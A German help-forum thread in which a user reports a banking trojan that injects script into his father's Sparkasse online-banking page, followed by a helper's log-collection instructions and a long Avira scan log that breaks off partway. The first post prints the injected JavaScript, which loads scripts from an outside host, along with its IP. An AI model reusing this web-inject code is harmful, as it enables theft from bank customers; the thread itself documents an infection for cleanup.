Sparkasse Java Script Hack

myzinsky · 12.11.2014, 12:43

Mein Vater hatte versucht sich beim Onlinebanking einzuloggen und wurde danach aufgefordert TANs einzugeben. Danach hatte er direkt Rücksprache mit der Kreissparkassen Hotline gehalten. Es hat jemand versucht einen hohen Geldbetrag auf ein ausländisches Konto zu transferieren.

Ich habe mir nun den PC meines Vaters näher angeschaut und alle relevanten Daten gesichert. Ich habe festgestellt, dass ein Virus die Browser kompromittiert hat und Schadcode in die Sparkassen Website einbaut:

Code:

ATTFilter

<script>
	if (document.location.href.indexOf('dkb.de') == -1)
	{
		document.write('<script type="text/javascript" src="https://ssiserver1024.com/service//scripts/jquery.js"></scr' + 'ipt>');
		document.write('<script type="text/javascript" src="https://ssiserver1024.com/service//scripts/sparkasse.js"></scr' + 'ipt>');
	}
</script>

Der IP hinter dem Server ist: 93.170.137.17 und stammt aus der Ukraine (Kiev).

Den JS code habe ich auch herunterladen falls das hilft.

Nach einem ausgiebigen Virenscan mit Avira habe ich 6 Vieren gefunden. Allerdings wird der JS Schadcode immer noch in die Website eingefügt.

Da es sich um einen alten WindowsXP laptop handelt, wird das gerät bald eh durch einen neuen PC ausgetauscht, für den Übergang hätte ich aber das Gerät gerne Wurmfrei.

Für Hilfestellungen wäre ich sehr dankbar!

Grüße
myzinsky

cosinus · 12.11.2014, 13:02

Hallo und

Hast du noch weitere Logs (mit Funden)? Malwarebytes und/oder andere Virenscanner, sind die mal fündig geworden?

Ich frage deswegen nach => http://www.trojaner-board.de/125889-...tml#post941520

Bitte keine neuen Virenscans machen sondern erst nur schon vorhandene Logs in CODE-Tags posten!
Relevant sind nur Logs der letzten 7 Tage bzw. seitdem das Problem besteht!

Zudem bitte auch ein Log mit Farbars Tool machen:

Scan mit Farbar's Recovery Scan Tool (FRST)

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:

FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)

Starte jetzt FRST.
Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:

Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

myzinsky · 12.11.2014, 13:46

Hier schonmal das log von Avira:

Code:

ATTFilter

Avira Free Antivirus
Erstellungsdatum der Reportdatei: Dienstag, 11. November 2014  14:08


Das Programm läuft als uneingeschränkte Vollversion.
Online-Dienste stehen zur Verfügung.

Lizenznehmer   : Avira Antivirus Free
Seriennummer   : 0000149996-AVHOE-0000001
Plattform      : Microsoft Windows XP
Windowsversion : (Service Pack 3)  [5.1.2600]
Boot Modus     : Normal gebootet
Benutzername   : SYSTEM
Computername   : KLAUS

Versionsinformationen:
BUILD.DAT      : 14.0.7.342     92013 Bytes  23.10.2014 14:02:00
AVSCAN.EXE     : 14.0.7.312   1015544 Bytes  23.10.2014 13:02:09
AVSCANRC.DLL   : 14.0.7.308     64304 Bytes  23.10.2014 13:02:09
LUKE.DLL       : 14.0.7.310     60664 Bytes  23.10.2014 13:02:26
AVSCPLR.DLL    : 14.0.7.310     93488 Bytes  23.10.2014 13:02:09
REPAIR.DLL     : 14.0.7.312    366328 Bytes  23.10.2014 13:02:06
REPAIR.RDF     : 1.0.2.30      596694 Bytes  11.11.2014 12:41:51
AVREG.DLL      : 14.0.7.310    264952 Bytes  23.10.2014 13:02:05
AVLODE.DLL     : 14.0.7.312    563448 Bytes  23.10.2014 13:02:02
AVLODE.RDF     : 14.0.4.50      76508 Bytes  11.11.2014 12:40:42
XBV00012.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00013.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00014.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00015.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00016.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00017.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00018.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00019.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00020.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00021.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00022.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00023.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00024.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00025.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00026.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00027.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00028.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00029.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00030.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00031.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00032.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00033.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00034.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00035.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00036.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00037.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00038.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00039.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00040.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00041.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 13:02:30
XBV00043.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00044.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00045.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00046.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00047.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00048.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00049.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00050.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00051.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00052.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00053.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00054.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00055.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00056.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:47
XBV00057.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00058.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00059.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00060.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00061.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00062.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00063.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00064.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00065.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00066.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00067.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00068.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00069.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00070.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00071.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00072.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00073.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:48
XBV00074.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00075.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00076.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00077.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00078.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00079.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00080.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00081.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00082.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00083.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00084.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00085.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00086.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00087.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00088.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00089.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00090.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:49
XBV00091.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00092.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00093.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00094.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00095.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00096.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00097.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00098.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00099.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00100.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00101.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00102.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00103.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00104.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00105.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00106.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00107.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00108.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00109.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:50
XBV00110.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00111.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00112.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00113.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00114.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00115.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00116.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00117.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00118.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00119.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00120.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00121.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00122.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00123.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00124.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00125.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00126.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:51
XBV00127.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00128.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00129.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00130.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00131.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00132.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00133.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00134.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00135.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00136.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00137.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00138.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00139.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00140.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00141.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00142.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00143.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00144.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:52
XBV00145.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00146.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00147.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00148.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00149.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00150.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00151.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00152.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00153.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00154.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00155.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00156.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00157.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00158.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00159.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00160.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00161.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00162.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:53
XBV00163.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00164.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00165.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00166.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00167.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00168.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00169.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00170.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00171.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00172.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00173.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00174.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00175.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00176.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00177.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00178.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00179.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00180.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:54
XBV00181.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00182.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00183.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00184.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00185.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00186.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00187.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00188.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00189.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00190.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00191.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00192.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00193.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00194.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00195.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00196.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00197.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:55
XBV00198.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00199.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00200.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00201.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00202.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00203.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00204.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00205.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00206.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00207.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00208.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00209.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00210.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00211.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00212.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00213.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:56
XBV00214.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:57
XBV00215.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:57
XBV00216.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:57
XBV00217.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:57
XBV00218.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:57
XBV00219.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:57
XBV00220.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:57
XBV00221.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:57
XBV00222.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:57
XBV00223.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:57
XBV00224.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:58
XBV00225.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:58
XBV00226.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:58
XBV00227.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:58
XBV00228.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:58
XBV00229.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:58
XBV00230.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:58
XBV00231.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:58
XBV00232.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:58
XBV00233.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:58
XBV00234.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00235.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00236.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00237.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00238.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00239.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00240.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00241.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00242.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00243.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00244.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00245.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00246.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00247.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00248.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00249.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00250.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:40:59
XBV00251.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:41:00
XBV00252.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:41:00
XBV00253.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:41:00
XBV00254.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:41:00
XBV00255.VDF   : 8.11.184.50     2048 Bytes  11.11.2014 12:41:00
XBV00000.VDF   : 7.11.70.0   66736640 Bytes  04.04.2013 13:02:30
XBV00001.VDF   : 7.11.74.226  2201600 Bytes  30.04.2013 13:02:30
XBV00002.VDF   : 7.11.80.60   2751488 Bytes  28.05.2013 13:02:30
XBV00003.VDF   : 7.11.85.214  2162688 Bytes  21.06.2013 13:02:30
XBV00004.VDF   : 7.11.91.176  3903488 Bytes  23.07.2013 13:02:30
XBV00005.VDF   : 7.11.98.186  6822912 Bytes  29.08.2013 13:02:30
XBV00006.VDF   : 7.11.139.38 15708672 Bytes  27.03.2014 13:02:30
XBV00007.VDF   : 7.11.152.100  4193792 Bytes  02.06.2014 13:02:30
XBV00008.VDF   : 8.11.165.192  4251136 Bytes  07.08.2014 13:02:30
XBV00009.VDF   : 8.11.172.30  2094080 Bytes  15.09.2014 13:02:30
XBV00010.VDF   : 8.11.178.32  1581056 Bytes  14.10.2014 13:02:30
XBV00011.VDF   : 8.11.184.50  2178560 Bytes  11.11.2014 12:40:46
XBV00042.VDF   : 8.11.184.74     2048 Bytes  11.11.2014 12:40:46
LOCAL000.VDF   : 8.11.184.74 113795072 Bytes  11.11.2014 12:43:28
Engineversion  : 8.3.26.8  
AEVDF.DLL      : 8.3.1.6       133992 Bytes  23.10.2014 13:01:55
AESCRIPT.DLL   : 8.2.2.12      527216 Bytes  11.11.2014 12:40:42
AESCN.DLL      : 8.3.2.2       139456 Bytes  23.10.2014 13:01:55
AESBX.DLL      : 8.2.20.24    1409224 Bytes  23.10.2014 13:01:55
AERDL.DLL      : 8.2.1.16      743328 Bytes  11.11.2014 12:40:41
AEPACK.DLL     : 8.4.0.54      788392 Bytes  23.10.2014 13:01:55
AEOFFICE.DLL   : 8.3.0.38      224112 Bytes  11.11.2014 12:40:40
AEHEUR.DLL     : 8.1.4.1384   7759784 Bytes  11.11.2014 12:40:40
AEHELP.DLL     : 8.3.1.0       278728 Bytes  23.10.2014 13:01:55
AEGEN.DLL      : 8.1.7.34      453480 Bytes  11.11.2014 12:40:34
AEEXP.DLL      : 8.4.2.32      247712 Bytes  23.10.2014 13:01:55
AEEMU.DLL      : 8.1.3.4       399264 Bytes  23.10.2014 13:01:55
AEDROID.DLL    : 8.4.2.24      442568 Bytes  23.10.2014 13:01:55
AECORE.DLL     : 8.3.2.6       243712 Bytes  23.10.2014 13:01:55
AEBB.DLL       : 8.1.2.0        60448 Bytes  23.10.2014 13:01:55
AVWINLL.DLL    : 14.0.7.308     25904 Bytes  23.10.2014 13:02:19
AVPREF.DLL     : 14.0.7.308     52016 Bytes  23.10.2014 13:02:05
AVREP.DLL      : 14.0.7.308    220976 Bytes  23.10.2014 13:02:05
AVARKT.DLL     : 14.0.7.308    227632 Bytes  23.10.2014 13:01:55
AVEVTLOG.DLL   : 14.0.7.310    184112 Bytes  23.10.2014 13:01:56
SQLITE3.DLL    : 14.0.7.308    453936 Bytes  23.10.2014 13:02:29
AVSMTP.DLL     : 14.0.7.308     79096 Bytes  23.10.2014 13:02:12
NETNT.DLL      : 14.0.7.308     15152 Bytes  23.10.2014 13:02:27
RCIMAGE.DLL    : 14.0.7.308   4865328 Bytes  23.10.2014 13:02:27
RCTEXT.DLL     : 14.0.7.318     77048 Bytes  23.10.2014 13:02:28

Konfiguration für den aktuellen Suchlauf:
Job Name..............................: Vollständige Systemprüfung
Konfigurationsdatei...................: C:\Programme\Avira\AntiVir Desktop\sysscan.avp
Protokollierung.......................: standard
Primäre Aktion........................: Interaktiv
Sekundäre Aktion......................: Ignorieren
Durchsuche Masterbootsektoren.........: ein
Durchsuche Bootsektoren...............: ein
Bootsektoren..........................: C:, 
Durchsuche aktive Programme...........: ein
Laufende Programme erweitert..........: ein
Durchsuche Registrierung..............: ein
Suche nach Rootkits...................: ein
Integritätsprüfung von Systemdateien..: aus
Prüfe alle Dateien....................: Alle Dateien
Durchsuche Archive....................: ein
Rekursionstiefe einschränken..........: 20
Archiv Smart Extensions...............: ein
Makrovirenheuristik...................: ein
Dateiheuristik........................: erweitert

Beginn des Suchlaufs: Dienstag, 11. November 2014  14:08

Der Suchlauf über die Bootsektoren wird begonnen:
Bootsektor 'HDD0(C:)'
    [INFO]      Es wurde kein Virus gefunden!

Der Suchlauf nach versteckten Objekten wird begonnen.

Der Suchlauf über gestartete Prozesse wird begonnen:
Durchsuche Prozess 'rsmsink.exe' - '31' Modul(e) wurden durchsucht
Durchsuche Prozess 'msdtc.exe' - '42' Modul(e) wurden durchsucht
Durchsuche Prozess 'dllhost.exe' - '62' Modul(e) wurden durchsucht
Durchsuche Prozess 'dllhost.exe' - '47' Modul(e) wurden durchsucht
Durchsuche Prozess 'vssvc.exe' - '50' Modul(e) wurden durchsucht
Durchsuche Prozess 'avscan.exe' - '100' Modul(e) wurden durchsucht
Durchsuche Prozess 'rundll32.exe' - '65' Modul(e) wurden durchsucht
Durchsuche Prozess 'avshadow.exe' - '29' Modul(e) wurden durchsucht
Durchsuche Prozess 'avguard.exe' - '112' Modul(e) wurden durchsucht
Durchsuche Prozess 'taskmgr.exe' - '39' Modul(e) wurden durchsucht
Durchsuche Prozess 'avcenter.exe' - '100' Modul(e) wurden durchsucht
Durchsuche Prozess 'wmiprvse.exe' - '49' Modul(e) wurden durchsucht
Durchsuche Prozess 'sched.exe' - '51' Modul(e) wurden durchsucht
Durchsuche Prozess 'avgnt.exe' - '75' Modul(e) wurden durchsucht
Durchsuche Prozess 'PresentationFontCache.exe' - '28' Modul(e) wurden durchsucht
Durchsuche Prozess 'Avira.OE.Systray.exe' - '145' Modul(e) wurden durchsucht
